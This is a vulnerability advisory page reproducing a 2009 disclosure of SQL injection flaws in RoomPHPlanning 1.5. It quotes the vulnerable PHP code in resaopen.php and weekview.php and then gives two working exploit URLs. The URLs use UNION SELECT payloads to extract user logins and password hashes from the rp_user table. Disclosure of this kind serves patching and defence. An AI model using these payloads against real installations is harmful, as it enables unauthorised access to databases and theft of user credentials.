RoomPHPlanning 1.5 Multiple Remote SQL Injection Vulnerabilities

2009.04.10
Credit: Virangar
Risk: High
Local: No
Remote: Yes
CWE: CWE-89


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

####################################################################################### # # # ...::::RoomPHPlanning 1.5 SQL Injection Vulnerabilities ::::... # ####################################################################################### Virangar Security Team www.virangar.net www.virangar.ir -------- Discoverd By :virangar security team(hadihadi) special tnx to:MR.nosrati,black.shadowes,MR.hesy,Zahra & all virangar members & all hackerz greetz:to my best friend in the world hadi_aryaie2004 & my lovely friend arash(imm02tal) ----- -------vuln codes in:----------- resaopen.php: line 7:@$idresa = $_GET['idresa']; .. .. ine 102:$qry = "SELECT IdRm, R.IdUs, TitleRs,". "DateRs, BegRs, EndRs, DescRs,". "BillRs, NameUs ". "FROM ".RESA." R, ".USER." U ". "WHERE IdRs=".$idresa." ". "AND R.IdUs=U.IdUs"; ********* weekview.php: @$idroom = $_GET['idroom']; .... line 47:$qry = "SELECT NameRm, BkcolRm, FtcolRm ". "FROM ".ROOM." WHERE IdRm=".$idroom ; --- exploits: http://site.com/resaopen.php?idresa=-99999/**/union/**/select/**/1,2,3,4,5,6,concat(LoginUs,0x3a,char(58),PwdUs),8,9/**/from/**/rp_user/**/where/**/IdRk=1/* http://site.com/weekview.php?idroom=-999/**/union/**/select/**/concat(LoginUs,0x3a,char(58),PwdUs),2,3/**/from/**/rp_user/**/where/**/IdRk=1/* --- young iranian h4ck3rz


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top